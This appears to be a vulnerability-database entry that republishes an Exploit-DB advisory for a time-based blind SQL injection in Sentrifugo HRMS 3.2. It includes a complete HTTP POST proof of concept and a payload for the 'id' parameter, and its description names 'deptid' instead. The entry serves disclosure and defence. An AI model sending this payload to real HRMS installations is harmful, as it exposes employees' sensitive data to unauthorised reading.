Sentrifugo HRMS 3.2 - 'id' SQL Injection

vendor:

Sentrifugo HRMS

by:

minhnb

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Sentrifugo HRMS

Affected Version From: 3.2

Affected Version To: Possibly before 3.2

Patch Exists: NO

Related CWE:

CPE: a:sentrifugo_hrms_project:sentrifugo_hrms:3.2

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 x64, Kali Linux

2020

Sentrifugo HRMS 3.2 – ‘id’ SQL Injection

Sentrifugo HRMS version 3.2 and possibly before are affected by Blind SQL Injection in deptid parameter through POST request in "/sentrifugo/index.php/holidaygroups/add" resource. This allows a user of the application without permissions to read sensitive information from the database used by the application.

Mitigation:

Apply a patch or update to a patched version when available. Implement proper input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Sentrifugo HRMS 3.2 - 'id' SQL Injection
# Exploit Author: minhnb
# Website: 
# Date: 2020-03-06
# Google Dork: N/A
# Vendor: http://www.sapplica.com
# Software Link: http://www.sentrifugo.com/download
# Affected Version: 3.2 and possibly before
# Patched Version: unpatched
# Category: Web Application
# Platform: PHP
# Tested on: Win10x64 & Kali Linux
# CVE: N/A
 
# 1. Technical Description:
# Sentrifugo HRMS version 3.2 and possibly before are affected by Blind SQL Injection in deptid
# parameter through POST request in "/sentrifugo/index.php/holidaygroups/add" resource.
# This allows a user of the application without permissions to read sensitive information from
# the database used by the application.
  
# 2. Proof Of Concept (PoC):

POST /sentrifugo/index.php/holidaygroups/add HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://localhost/sentrifugo/index.php
Connection: keep-alive
Cookie: PHPSESSID=j4a2o4mq6frhfltq2a0h2spknh
Accept: */*
Accept-Encoding: gzip,deflate
Content-Length: 98
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate()%2Csleep(9)%2C0))XOR'Z&submit=Save


# 3. Payload:

Parameter: id (POST)
    Type: time-based blind
    Title: MySQL >= 5.0 time-based blind - Parameter replace
    Payload: Cancel=1&description=555&groupname=e&id=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z&submit=Save

# 4. Reference: